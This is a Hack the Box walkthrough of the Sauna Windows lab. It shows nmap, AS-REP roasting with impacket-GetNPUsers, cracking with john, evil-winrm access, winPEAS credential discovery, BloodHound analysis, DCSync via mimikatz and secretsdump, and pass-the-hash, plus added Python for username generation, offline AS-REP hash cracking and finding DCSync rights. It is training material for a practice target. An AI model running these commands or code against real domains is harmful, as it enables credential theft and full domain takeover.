Hack the Box Sauna Walkthrough
Today we are going to solve a HTB machine named Sauna. Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation.
The credit for making this lab goes to egotisticalSW.
Level: Easy
Penetration Testing Methodology
Recon
- Nmap
Enumeration
- Web application
- username-anarchy
Exploitation (Initial Access)
- AS-REP Roasting
- john the ripper
- evil-winrm
Privilege Escalation
- winPEASx64
- bloodhound-python
- DCSync
- mimikatz
- impacket-secretsdump
- Pass The Hash
- Capture the Flag
Walkthrough
Recon
Start the enumeration with a port and service scan using nmap.
nmap -sV 10.129.128.245
The nmap results suggest the domain name is EGOTISTICAL-BANK.LOCAL (it shows up in the LDAP service banner).
Enumeration
On port 80 there is a website whose About Us page lists the team members by full name.
To turn those names into a list of candidate usernames, we use the username-anarchy tool, which you can download from:
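What username-anarchy does at this step, as an added Python example (not the walkthrough's own code and not the tool itself): it expands each "First Last" name into the username formats that AD environments commonly use, so that one of them (here fsmith) matches the real account. The three names in TEAM are constructed sample input, not a claim about what the site lists.

```python
"""Expand full names into candidate AD usernames (username-anarchy style).
Added example, not the walkthrough's code; TEAM below is constructed input."""
import re


def candidates(full_name: str) -> list:
    """Return common username formats for one 'First Last' name, most likely first."""
    parts = [re.sub(r"[^a-z]", "", p.lower()) for p in full_name.split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:          # single token: nothing to combine
        return parts[:1]
    first, last = parts[0], parts[-1]   # middle names are ignored
    formats = [
        first,                   # fergus
        last,                    # smith
        first[0] + last,         # fsmith   (the format that hits on this box)
        first[0] + "." + last,   # f.smith
        first + "." + last,      # fergus.smith
        first + last,            # fergussmith
        first + "_" + last,      # fergus_smith
        first + last[0],         # ferguss
        last + first[0],         # smithf
        last + first,            # smithfergus
    ]
    out = []
    for c in formats:            # keep order, drop duplicates (e.g. first == last[0] cases)
        if c not in out:
            out.append(c)
    return out


def build_userlist(names) -> list:
    """Merge the candidates for every name into one de-duplicated users.txt list."""
    seen = []
    for name in names:
        for c in candidates(name):
            if c not in seen:
                seen.append(c)
    return seen


TEAM = ["Fergus Smith", "Hugo Bear", "Sophie Driver"]  # constructed sample names

if __name__ == "__main__":
    # Redirect this to users.txt and feed it to GetNPUsers.
    print("\n".join(build_userlist(TEAM)))
```

The list is deliberately generous: AS-REP roasting against a non-existent username costs nothing but a Kerberos error, so over-generating usernames is cheap, while missing the real format means missing the only roastable account.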
Before starting any exploitation, add a host entry for the target machine IP to /etc/hosts so the domain name resolves.
Exploitation
During enumeration we observed that port 88, the Kerberos service port, is open. This article covers the attacks related to port 88: https://viperone.gitbook.io/pentest-everything/everything/ports/port-88-or-kerberos
So AS-REP roasting can be tried here.
AS-REP roasting targets accounts that have the "Do not require Kerberos preauthentication" property set. For such an account the KDC answers an AS-REQ without any proof of the password, and part of the AS-REP it returns is encrypted with a key derived from the account's password, so that reply can be cracked offline against a wordlist.
Since we already have a list of usernames and the Kerberos service is reachable, we use the impacket-GetNPUsers script shipped with Kali, which requests an AS-REP for every user in the list and prints the crackable hash for any account that has pre-authentication disabled.
impacket-GetNPUsers -dc-ip 10.129.128.245 EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt
The fsmith account has pre-authentication disabled, so its AS-REP hash is returned.
Copying the obtained hash into a file named hashes.
Cracking the above obtained hash using john the ripper tool.
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
It can be seen that the password for the fsmith user is Thestrokes23.
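What john is actually checking for each wordlist entry, as an added Python example (not the walkthrough's, impacket's or john's code): the `$krb5asrep$23$` line carries the RC4-HMAC checksum and ciphertext of the AS-REP enc-part, and a candidate password is correct when its NT hash, run through the RFC 4757 key derivation with usage number 8, decrypts the ciphertext to data whose HMAC-MD5 matches the checksum. The block plays the KDC side too so it runs offline: the enc-part bytes, the fixed all-zero confounder (real KDCs use 8 random bytes) and the mini wordlist are constructed; MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
"""AS-REP roasting, the offline half: verify candidate passwords against a
$krb5asrep$23$ line. Added example, not the walkthrough's code; enc-part,
confounder and wordlist are constructed."""
import hashlib, hmac, re, struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (needed for the NT hash; hashlib's md4 may be disabled)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (list(range(16)), (3, 7, 11, 19), F, 0),
        ([0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), G, 0x5A827999),
        ([0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), H, 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for order, shifts, fn, k in rounds:
            for j, i in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[i] + k) & MASK, shifts[j % 4])
                a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (KSA + PRGA)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


AS_REP_USAGE = 8  # RFC 4757 key-usage number for the AS-REP enc-part


def asrep_encrypt(password: str, plaintext: bytes, confounder: bytes = b"\x00" * 8) -> bytes:
    """KDC side of RC4-HMAC: returns checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_USAGE))
    body = confounder + plaintext
    checksum = hmac_md5(k1, body)
    return checksum + rc4(hmac_md5(k1, checksum), body)


def john_line(user: str, realm: str, enc: bytes) -> str:
    """Format the enc-part the way GetNPUsers prints it for john/hashcat."""
    return f"$krb5asrep$23${user}@{realm}:{enc[:16].hex()}${enc[16:].hex()}"


def crack_asrep(line: str, wordlist) -> str:
    """Return the first wordlist entry whose NT hash verifies the checksum, else None."""
    m = re.fullmatch(r"\$krb5asrep\$23\$([^@]+)@([^:]+):([0-9a-f]{32})\$([0-9a-f]+)", line)
    if not m:
        raise ValueError("not a $krb5asrep$23$ hash")
    checksum, ct = bytes.fromhex(m.group(3)), bytes.fromhex(m.group(4))
    for pw in wordlist:
        k1 = hmac_md5(nt_hash(pw), struct.pack("<I", AS_REP_USAGE))
        pt = rc4(hmac_md5(k1, checksum), ct)   # K3 = HMAC(K1, checksum)
        if hmac.compare_digest(hmac_md5(k1, pt), checksum):
            return pw
    return None


if __name__ == "__main__":
    enc = asrep_encrypt("Thestrokes23", b"constructed EncASRepPart bytes")
    line = john_line("fsmith", "EGOTISTICAL-BANK.LOCAL", enc)
    print(line)
    print("cracked:", crack_asrep(line, ["password", "123456", "Thestrokes23"]))
```

The check is purely offline: nothing touches the KDC after the single AS-REQ, which is why the defensive fix is to re-enable pre-authentication (and why the only traces left are a 4768 ticket request with pre-authentication type 0).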
Initial Access
Initial access is obtained by logging into the target over WinRM with evil-winrm (the IP is passed with the lowercase -i option).
evil-winrm -i 10.129.128.245 -u fsmith -p Thestrokes23
Privilege Escalation
To look for privilege-escalation paths, we upload winPEASx64.exe to the target with evil-winrm's upload command.
Run winPEASx64.exe after transferring it.
The winPEAS output showed a set of stored credentials for the domain user svc_loanmanager with the password Moneymakestheworldgoround! (they come from the Winlogon AutoLogon registry values).
The svc_loanmanager name does not match an account on the box; listing the domain users shows an account named svc_loanmgr instead, and the same password works for it. To enumerate further, we can use BloodHound to map the Active Directory rights and permissions.
We can take an overview of the Active Directory structure using the bloodhound-python script. The following command will generate the .json files, which we can later import into the Bloodhound (neo4j database) to analyze the results.
bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.129.128.245 -d EGOTISTICAL-BANK.LOCAL -c All
Start neo4j as a console application, then run BloodHound and import all the .json files.
BloodHound shows that svc_loanmgr holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights (the GetChanges and GetChangesAll edges) on the domain object. Together these are exactly what a DCSync attack needs: the account can ask the domain controller to replicate any user's credential material, including the Administrator's hash.
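The same check done directly on the bloodhound-python output, as an added Python example (not the walkthrough's code and not part of BloodHound): it reads the domain ACEs and reports which principals can DCSync. The sample JSON is constructed; its layout (a "data" list whose entries carry "Aces" with PrincipalSID, PrincipalType and RightName) is assumed to mirror what bloodhound-python writes to its domains.json, and the SIDs are made up. The edge case it encodes is the one BloodHound itself applies: GetChanges alone is not enough, the pair GetChanges plus GetChangesAll is, and a principal with AllExtendedRights or GenericAll on the domain object gets the replication rights implicitly.

```python
"""Find DCSync-capable principals in a bloodhound-python domains.json.
Added example, not the walkthrough's code; the JSON below is constructed and
its key names are an assumption about the collector's output format."""
import json

SAMPLE_DOMAINS_JSON = json.dumps({
    "data": [{
        "Properties": {"name": "EGOTISTICAL-BANK.LOCAL"},
        "Aces": [
            # service account with both replication rights -> can DCSync
            {"PrincipalSID": "S-1-5-21-1-1-1-1105", "PrincipalType": "User",
             "RightName": "GetChanges", "IsInherited": False},
            {"PrincipalSID": "S-1-5-21-1-1-1-1105", "PrincipalType": "User",
             "RightName": "GetChangesAll", "IsInherited": False},
            # account with only GetChanges -> NOT enough for DCSync
            {"PrincipalSID": "S-1-5-21-1-1-1-1106", "PrincipalType": "User",
             "RightName": "GetChanges", "IsInherited": False},
            # group with GenericAll on the domain object -> implicitly can DCSync
            {"PrincipalSID": "S-1-5-21-1-1-1-512", "PrincipalType": "Group",
             "RightName": "GenericAll", "IsInherited": False},
        ],
    }],
    "meta": {"type": "domains", "count": 1, "version": 4},
})

REPLICATION_PAIR = {"GetChanges", "GetChangesAll"}
IMPLICIT_RIGHTS = {"AllExtendedRights", "GenericAll"}


def dcsync_principals(domains_json: str) -> dict:
    """Map domain name -> sorted list of principal SIDs that can run DCSync."""
    result = {}
    for dom in json.loads(domains_json)["data"]:
        name = dom["Properties"]["name"]
        rights = {}
        for ace in dom.get("Aces", []):
            rights.setdefault(ace["PrincipalSID"], set()).add(ace["RightName"])
        capable = [
            sid for sid, held in rights.items()
            if REPLICATION_PAIR <= held or held & IMPLICIT_RIGHTS
        ]
        result[name] = sorted(capable)
    return result


if __name__ == "__main__":
    for domain, sids in dcsync_principals(SAMPLE_DOMAINS_JSON).items():
        print(domain)
        for sid in sids:
            print("  can DCSync:", sid)
```

To turn SIDs into names, join against the ObjectIdentifier field of users.json and groups.json from the same collection. On a real domain the expected hits are Domain Controllers, Enterprise Domain Controllers, Administrators and Domain Admins; any other principal in the list, such as a service account, is a finding.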
The credentials can be dumped with mimikatz.exe or with the impacket-secretsdump script. We show both methods, starting with mimikatz.exe.
After transferring mimikatz.exe, run the following command:
./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
This replicates the Administrator account from the domain controller and prints its NTLM hash.
You can obtain a similar NTLM hash using the impacket-secretsdump script.
The following command can be used to dump the hash:
impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.128.245 -just-dc-user Administrator
Finally, the obtained NTLM hash can be used to log into the target as Administrator with a Pass-the-Hash attack: evil-winrm accepts the NT hash through its -H option in place of a password, so the Administrator hash never needs to be cracked.
If you want to read more HTB Write-ups. Follow this Link.
Author: Vinayak Chauhan is an InfoSec researcher and Security Consultant. Contact here